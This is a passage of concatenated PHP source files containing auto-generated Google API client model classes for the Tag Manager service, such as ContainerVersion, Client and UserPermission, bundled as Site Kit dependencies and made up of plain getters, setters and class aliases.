\class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\WmxSite::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_WmxSite'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListTagsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'tag'; /** * @var string */ public $nextPageToken; protected $tagType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag::class; protected $tagDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Tag[] */ public function setTag($tag) { $this->tag = $tag; } /** * @return Tag[] */ public function getTag() { return $this->tag; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTagsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListTagsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class RevertVariableResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $variableType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable::class; protected $variableDataType = ''; /** * @param Variable */ public function setVariable(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable $variable) { $this->variable = $variable; } /** * @return Variable */ public function getVariable() { return $this->variable; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertVariableResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_RevertVariableResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class GetContainerSnippetResponse extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $snippet; /** * @param string */ public function setSnippet($snippet) { $this->snippet = $snippet; } /** * @return string */ public function getSnippet() { return $this->snippet; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\GetContainerSnippetResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_GetContainerSnippetResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ZoneBoundary extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'customEvaluationTriggerId'; protected $conditionType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Condition::class; protected $conditionDataType = 'array'; /** * @var string[] */ public $customEvaluationTriggerId; /** * @param Condition[] */ public function setCondition($condition) { $this->condition = $condition; } /** * @return Condition[] */ public function getCondition() { return $this->condition; } /** * @param string[] */ public function setCustomEvaluationTriggerId($customEvaluationTriggerId) { $this->customEvaluationTriggerId = $customEvaluationTriggerId; } /** * @return string[] */ public function getCustomEvaluationTriggerId() { return $this->customEvaluationTriggerId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ZoneBoundary::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ZoneBoundary'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListTemplatesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'template'; /** * @var string */ public $nextPageToken; protected $templateType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate::class; protected $templateDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param CustomTemplate[] */ public function setTemplate($template) { $this->template = $template; } /** * @return CustomTemplate[] */ public function getTemplate() { return $this->template; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTemplatesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListTemplatesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListTriggersResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'trigger'; /** * @var string */ public $nextPageToken; protected $triggerType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger::class; protected $triggerDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Trigger[] */ public function setTrigger($trigger) { $this->trigger = $trigger; } /** * @return Trigger[] */ public function getTrigger() { return $this->trigger; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListTriggersResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListTriggersResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ContainerVersion extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'zone'; /** * @var string */ public $accountId; protected $builtInVariableType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\BuiltInVariable::class; protected $builtInVariableDataType = 'array'; protected $clientType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Client::class; protected $clientDataType = 'array'; protected $containerType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Container::class; protected $containerDataType = ''; /** * @var string */ public $containerId; /** * @var string */ public $containerVersionId; protected $customTemplateType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate::class; protected $customTemplateDataType = 'array'; /** * @var bool */ public $deleted; /** * @var string */ public $description; /** * @var string */ public $fingerprint; protected $folderType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder::class; protected $folderDataType = 'array'; protected $gtagConfigType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\GtagConfig::class; protected $gtagConfigDataType = 'array'; /** * @var string */ public $name; /** * @var string */ public $path; protected $tagType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag::class; protected $tagDataType = 'array'; /** * @var string */ public $tagManagerUrl; protected $transformationType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation::class; protected $transformationDataType = 'array'; protected $triggerType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger::class; protected $triggerDataType = 'array'; protected $variableType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable::class; protected $variableDataType = 'array'; protected $zoneType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone::class; protected $zoneDataType = 'array'; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param BuiltInVariable[] */ public function setBuiltInVariable($builtInVariable) { $this->builtInVariable = $builtInVariable; } /** * @return BuiltInVariable[] */ public function getBuiltInVariable() { return $this->builtInVariable; } /** * @param Client[] */ public function setClient($client) { $this->client = $client; } /** * @return Client[] */ public function getClient() { return $this->client; } /** * @param Container */ public function setContainer(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Container $container) { $this->container = $container; } /** * @return Container */ public function getContainer() { return $this->container; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setContainerVersionId($containerVersionId) { $this->containerVersionId = $containerVersionId; } /** * @return string */ public function getContainerVersionId() { return $this->containerVersionId; } /** * @param CustomTemplate[] */ public function setCustomTemplate($customTemplate) { $this->customTemplate = $customTemplate; } /** * @return CustomTemplate[] */ public function getCustomTemplate() { return $this->customTemplate; } /** * @param bool */ public function setDeleted($deleted) { $this->deleted = $deleted; } /** * @return bool */ public function getDeleted() { return $this->deleted; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param Folder[] */ public function setFolder($folder) { $this->folder = $folder; } /** * @return Folder[] */ public function getFolder() { return $this->folder; } /** * @param GtagConfig[] */ public function setGtagConfig($gtagConfig) { $this->gtagConfig = $gtagConfig; } /** * @return GtagConfig[] */ public function getGtagConfig() { return $this->gtagConfig; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param Tag[] */ public function setTag($tag) { $this->tag = $tag; } /** * @return Tag[] */ public function getTag() { return $this->tag; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param Transformation[] */ public function setTransformation($transformation) { $this->transformation = $transformation; } /** * @return Transformation[] */ public function getTransformation() { return $this->transformation; } /** * @param Trigger[] */ public function setTrigger($trigger) { $this->trigger = $trigger; } /** * @return Trigger[] */ public function getTrigger() { return $this->trigger; } /** * @param Variable[] */ public function setVariable($variable) { $this->variable = $variable; } /** * @return Variable[] */ public function getVariable() { return $this->variable; } /** * @param Zone[] */ public function setZone($zone) { $this->zone = $zone; } /** * @return Zone[] */ public function getZone() { return $this->zone; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ContainerVersion'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ZoneChildContainer extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $nickname; /** * @var string */ public $publicId; /** * @param string */ public function setNickname($nickname) { $this->nickname = $nickname; } /** * @return string */ public function getNickname() { return $this->nickname; } /** * @param string */ public function setPublicId($publicId) { $this->publicId = $publicId; } /** * @return string */ public function getPublicId() { return $this->publicId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ZoneChildContainer::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ZoneChildContainer'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class MergeConflict extends \Google\Site_Kit_Dependencies\Google\Model { protected $entityInBaseVersionType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Entity::class; protected $entityInBaseVersionDataType = ''; protected $entityInWorkspaceType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Entity::class; protected $entityInWorkspaceDataType = ''; /** * @param Entity */ public function setEntityInBaseVersion(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Entity $entityInBaseVersion) { $this->entityInBaseVersion = $entityInBaseVersion; } /** * @return Entity */ public function getEntityInBaseVersion() { return $this->entityInBaseVersion; } /** * @param Entity */ public function setEntityInWorkspace(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Entity $entityInWorkspace) { $this->entityInWorkspace = $entityInWorkspace; } /** * @return Entity */ public function getEntityInWorkspace() { return $this->entityInWorkspace; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\MergeConflict::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_MergeConflict'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class TeardownTag extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $stopTeardownOnFailure; /** * @var string */ public $tagName; /** * @param bool */ public function setStopTeardownOnFailure($stopTeardownOnFailure) { $this->stopTeardownOnFailure = $stopTeardownOnFailure; } /** * @return bool */ public function getStopTeardownOnFailure() { return $this->stopTeardownOnFailure; } /** * @param string */ public function setTagName($tagName) { $this->tagName = $tagName; } /** * @return string */ public function getTagName() { return $this->tagName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\TeardownTag::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_TeardownTag'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class BuiltInVariable extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountId; /** * @var string */ public $containerId; /** * @var string */ public $name; /** * @var string */ public $path; /** * @var string */ public $type; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\BuiltInVariable::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_BuiltInVariable'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Client extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'parameter'; /** * @var string */ public $accountId; /** * @var string */ public $clientId; /** * @var string */ public $containerId; /** * @var string */ public $fingerprint; /** * @var string */ public $name; /** * @var string */ public $notes; protected $parameterType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $parameterDataType = 'array'; /** * @var string */ public $parentFolderId; /** * @var string */ public $path; /** * @var int */ public $priority; /** * @var string */ public $tagManagerUrl; /** * @var string */ public $type; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setClientId($clientId) { $this->clientId = $clientId; } /** * @return string */ public function getClientId() { return $this->clientId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setNotes($notes) { $this->notes = $notes; } /** * @return string */ public function getNotes() { return $this->notes; } /** * @param Parameter[] */ public function setParameter($parameter) { $this->parameter = $parameter; } /** * @return Parameter[] */ public function getParameter() { return $this->parameter; } /** * @param string */ public function setParentFolderId($parentFolderId) { $this->parentFolderId = $parentFolderId; } /** * @return string */ public function getParentFolderId() { return $this->parentFolderId; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param int */ public function setPriority($priority) { $this->priority = $priority; } /** * @return int */ public function getPriority() { return $this->priority; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Client::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Client'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class TagConsentSetting extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $consentStatus; protected $consentTypeType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $consentTypeDataType = ''; /** * @param string */ public function setConsentStatus($consentStatus) { $this->consentStatus = $consentStatus; } /** * @return string */ public function getConsentStatus() { return $this->consentStatus; } /** * @param Parameter */ public function setConsentType(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $consentType) { $this->consentType = $consentType; } /** * @return Parameter */ public function getConsentType() { return $this->consentType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\TagConsentSetting::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_TagConsentSetting'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class CreateBuiltInVariableResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'builtInVariable'; protected $builtInVariableType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\BuiltInVariable::class; protected $builtInVariableDataType = 'array'; /** * @param BuiltInVariable[] */ public function setBuiltInVariable($builtInVariable) { $this->builtInVariable = $builtInVariable; } /** * @return BuiltInVariable[] */ public function getBuiltInVariable() { return $this->builtInVariable; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\CreateBuiltInVariableResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_CreateBuiltInVariableResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class UserPermission extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'containerAccess'; protected $accountAccessType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\AccountAccess::class; protected $accountAccessDataType = ''; /** * @var string */ public $accountId; protected $containerAccessType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerAccess::class; protected $containerAccessDataType = 'array'; /** * @var string */ public $emailAddress; /** * @var string */ public $path; /** * @param AccountAccess */ public function setAccountAccess(\Google\Site_Kit_Dependencies\Google\Service\TagManager\AccountAccess $accountAccess) { $this->accountAccess = $accountAccess; } /** * @return AccountAccess */ public function getAccountAccess() { return $this->accountAccess; } /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param ContainerAccess[] */ public function setContainerAccess($containerAccess) { $this->containerAccess = $containerAccess; } /** * @return ContainerAccess[] */ public function getContainerAccess() { return $this->containerAccess; } /** * @param string */ public function setEmailAddress($emailAddress) { $this->emailAddress = $emailAddress; } /** * @return string */ public function getEmailAddress() { return $this->emailAddress; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\UserPermission::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_UserPermission'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class RevertTemplateResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $templateType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate::class; protected $templateDataType = ''; /** * @param CustomTemplate */ public function setTemplate(\Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate $template) { $this->template = $template; } /** * @return CustomTemplate */ public function getTemplate() { return $this->template; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTemplateResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_RevertTemplateResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class RevertClientResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $clientType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Client::class; protected $clientDataType = ''; /** * @param Client */ public function setClient(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Client $client) { $this->client = $client; } /** * @return Client */ public function getClient() { return $this->client; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertClientResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_RevertClientResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListDestinationsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'destination'; protected $destinationType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Destination::class; protected $destinationDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param Destination[] */ public function setDestination($destination) { $this->destination = $destination; } /** * @return Destination[] */ public function getDestination() { return $this->destination; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListDestinationsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListDestinationsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class CreateContainerVersionResponse extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $compilerError; protected $containerVersionType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion::class; protected $containerVersionDataType = ''; /** * @var string */ public $newWorkspacePath; protected $syncStatusType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\SyncStatus::class; protected $syncStatusDataType = ''; /** * @param bool */ public function setCompilerError($compilerError) { $this->compilerError = $compilerError; } /** * @return bool */ public function getCompilerError() { return $this->compilerError; } /** * @param ContainerVersion */ public function setContainerVersion(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion $containerVersion) { $this->containerVersion = $containerVersion; } /** * @return ContainerVersion */ public function getContainerVersion() { return $this->containerVersion; } /** * @param string */ public function setNewWorkspacePath($newWorkspacePath) { $this->newWorkspacePath = $newWorkspacePath; } /** * @return string */ public function getNewWorkspacePath() { return $this->newWorkspacePath; } /** * @param SyncStatus */ public function setSyncStatus(\Google\Site_Kit_Dependencies\Google\Service\TagManager\SyncStatus $syncStatus) { $this->syncStatus = $syncStatus; } /** * @return SyncStatus */ public function getSyncStatus() { return $this->syncStatus; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\CreateContainerVersionResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_CreateContainerVersionResponse'); <?php /* * 